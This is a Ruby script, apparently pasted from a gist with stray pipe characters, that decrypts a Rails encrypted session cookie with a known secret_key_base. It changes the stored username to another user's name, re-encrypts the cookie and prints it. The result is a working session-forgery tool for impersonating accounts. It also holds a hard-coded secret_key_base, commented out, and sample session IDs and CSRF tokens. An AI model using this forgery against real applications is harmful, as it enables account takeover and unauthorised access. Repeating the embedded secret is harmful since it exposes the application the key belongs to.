|
require 'base64' |
|
require 'openssl' |
|
require 'uri' |
|
require 'json' |
|
require 'pry' |
|
require 'cgi' |
|
#cookie = "aDkxgmW4kaxoXBGnjxAaBY7D47WUOveFdeai5kk2hHlYVqDo7xtzZJup5euTdH5ja5iOt37MMS4SVXQT5RteaZjvpdlA%2FLQi7IYSPZLz--2A6LCUu%2F5AsLfSez--QD%2FwiA2t8QQrKk6rrROlPQ%3D%3D" |
|
cookie = ARGV[0] |
|
|
|
def decrypt_and_encrypt_cookie(cookie) |
|
cookie = URI.unescape(cookie) |
|
data, iv, auth_tag = cookie.split("--").map do |v| |
|
Base64.strict_decode64(v) |
|
end |
|
|
|
|
|
cipher = OpenSSL::Cipher.new("aes-256-gcm") |
|
|
|
# Compute the encryption key |
|
secret_key_base = '' || Rails.application.secret_key_base |
|
secret = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, "authenticated encrypted cookie", 1000, cipher.key_len) |
|
|
|
# Setup cipher for decryption and add inputs |
|
cipher.decrypt |
|
cipher.key = secret |
|
cipher.iv = iv |
|
cipher.auth_tag = auth_tag |
|
cipher.auth_data = "" |
|
|
|
|
|
# Perform decryption |
|
cookie_payload = cipher.update(data) |
|
cookie_payload << cipher.final |
|
cookie_payload = JSON.parse cookie_payload |
|
# => {"_rails"=>{"message"=>"InRva2VuIg==", "exp"=>nil, "pur"=>"cookie.remember_token"}} |
|
|
|
puts "original_cookie : #{cookie_payload}" |
|
puts "\n" |
|
puts "\n" |
|
puts "\n" |
|
# Decode Base64 encoded stored data |
|
decoded_stored_value = Base64.decode64 cookie_payload["_rails"]["message"] |
|
stored_value = JSON.parse decoded_stored_value |
|
|
|
puts "original_message : #{stored_value}" |
|
puts "\n" |
|
puts "\n" |
|
puts "\n" |
|
|
|
#stored_value['username'] = 'admin' |
|
#{"session_id"=>"23e5ff760739d72964b37c6bd7a46fe6", "_csrf_token"=>"SvRoy0INX9tY2hibijqfJtaTFa2RLXoP4RGbJU4FhmE="} |
|
#{"session_id"=>"f67bc204b8777bfed362a4e785b977f9", "_csrf_token"=>"CKQhzAg1RpEENcxJuYwveQVYBqMPqPqy0Z//7hvvZQQ="} |
|
stored_value = {"session_id"=>"f67bc204b8777bfed362a4e785b977f9", "_csrf_token"=>"CKQhzAg1RpEENcxJuYwveQVYBqMPqPqy0Z//7hvvZQQ=", "username"=>"ankit", "expiry_timestamp"=>1635577737, "password_expiry_timestamp"=>163753633, "auth_method" => 'db'} |
|
stored_value['username'] = 'mjong' |
|
#stored_value['expiry_timestamp'] = 1635577737 |
|
#stored_value['password_expiry_timestamp'] = 163753633 |
|
|
|
new_message = stored_value |
|
|
|
puts "new_message: #{new_message}" |
|
|
|
base64_message = Base64.strict_encode64(new_message.to_json) |
|
|
|
cookie_payload['_rails']['message'] = base64_message |
|
new_cookie = cookie_payload |
|
|
|
puts "new_cookie_payload: #{new_cookie}" |
|
puts "\n" |
|
puts "\n" |
|
puts "\n" |
|
|
|
cipher = OpenSSL::Cipher.new("aes-256-gcm") |
|
|
|
# Compute the encryption key |
|
#secret_key_base = Rails.application.secret_key_base |
|
#secret_key_base = '06b7592085f9762a3993d419aef45ea60cfe4fb813ff2fab35bfff736bc50efe939434f22ec1ee45618cbf60ed244d9b153ec19fa831bd05a72f39f49d399e0c' |
|
secret = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, "authenticated encrypted cookie", 1000, cipher.key_len) |
|
cipher.encrypt |
|
cipher.key = secret |
|
cipher.iv = iv |
|
cipher.auth_data = "" |
|
|
|
#old_cookie = Base64.encode64(cipher.update(cookie_payload.to_json)) |
|
#puts old_cookie, 222 |
|
|
|
#iv = cipher.random_iv |
|
|
|
encrypted_data = cipher.update(new_cookie.to_json) |
|
encrypted_data << cipher.final |
|
|
|
blob = "#{::Base64.strict_encode64 encrypted_data}--#{::Base64.strict_encode64 iv}" |
|
blob = "#{blob}--#{::Base64.strict_encode64 cipher.auth_tag}" |
|
blob |
|
end |
|
|
|
cookie = decrypt_and_encrypt_cookie(cookie) |
|
cookie = CGI.escape(cookie) |
|
puts "new : #{cookie}" |
|
puts "\n" |
|
puts "\n" |
|
puts "\n" |
|
|
|
#decrypt_and_encrypt_cookie(cookie) |